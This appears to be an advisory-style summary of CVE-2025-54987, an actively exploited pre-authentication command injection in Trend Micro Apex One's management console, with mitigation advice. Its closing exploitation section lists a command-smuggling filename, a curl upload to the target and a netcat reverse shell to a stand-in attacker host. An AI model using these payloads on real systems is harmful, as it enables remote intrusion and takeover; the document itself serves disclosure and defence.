Apex One: OS command injection in Trend Micro Apex One management console (CVE-2025-54987) #shorts
Summary
Today we’re discussing CVE-2025-54987, a critical unauthenticated command injection vulnerability in Trend Micro Apex One’s on-premise management console. Exploited in the wild, it allows attackers to upload malicious code and execute arbitrary commands without credentials. Trend Micro has released a temporary mitigation and plans a full patch in mid-August 2025.
Product details
The affected product is Trend Micro Apex One (on-premise), specifically version 2019 (14.0) builds earlier than 14.0.0.14039. Apex One provides endpoint security management for enterprise environments. This issue targets the management console component across multiple CPU architectures.
Vulnerability type summary
CVE-2025-54987 is classified under CWE-78: OS Command Injection. It allows attackers to inject arbitrary operating system commands into the application. Notably, this is a pre-authentication flaw, meaning no valid user credentials are required to trigger the vulnerability.
Details of the vulnerability
An attacker can send specially crafted requests to the Apex One management console, exploiting unvalidated input in file upload or request handling routines. By crafting payloads that include shell commands, the attacker causes the console to execute them with system privileges. This vulnerability mirrors CVE-2025-54948 but is specific to different CPU architectures. Indicators of compromise include unexpected command executions, new files in the console’s working directories, and abnormal network traffic. Trend Micro confirmed active exploitation, released a temporary mitigation tool, and advises administrators to apply it immediately.
Conclusion
Organizations using Trend Micro Apex One on-premise must deploy the temporary mitigation tool without delay and plan to upgrade to the patched version once Trend Micro’s mid-August 2025 update is available. In the meantime, monitor your management console logs for suspicious activity, restrict access to the console, and review firewall rules to limit inbound traffic to trusted sources.
Watch the full video on YouTube: CVE-2025-54987
Remediation and exploitation details
This chain involves the following actors
- Attacker: Pre-authenticated remote malicious actor
- Administrator: Defender and system operator
This following systems are involved
- Trend Micro Apex One on-premise management console (Centralized security management): Receives and processes HTTP requests for file upload and command execution
Attack entry point
- HTTP file upload API: Unauthenticated endpoint in the management console that accepts user-supplied files
Remediation actions
Exploitation actions
Port scan or web application enumeration
- Identify HTTP port and check /upload or /import paths with an automated scanner
OS command injection via file upload parameter
- Embed shell commands in file name or metadata, e.g. filename="report.txt;id;echo"
Custom HTTP POST with multipart/form-data
- curl -X POST "http://target:8200/upload" -F "file=@payload.txt"
Invoke the processing flow that concatenates user input into OS command
- Access the console or wait for scheduled task to process the uploaded file
Spawn a backdoor or interactive shell
- Execute: nc -e /bin/sh attacker.example.com 4444
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://success.trendmicro.com/en-US/solution/KA-0020652
- [2025-08-07] Trend Micro warns of actively exploited critical vulnerabilities in Apex One endpoint security product.
- [2025-08-06] Trend Micro warns of unauthenticated command injection vulnerabilities in Apex One being exploited in the wild, with a patch expected in mid-August 2025.
- [2025-08-06] Trend Micro releases a temporary mitigation tool for two exploited zero-day command injection vulnerabilities in Apex One.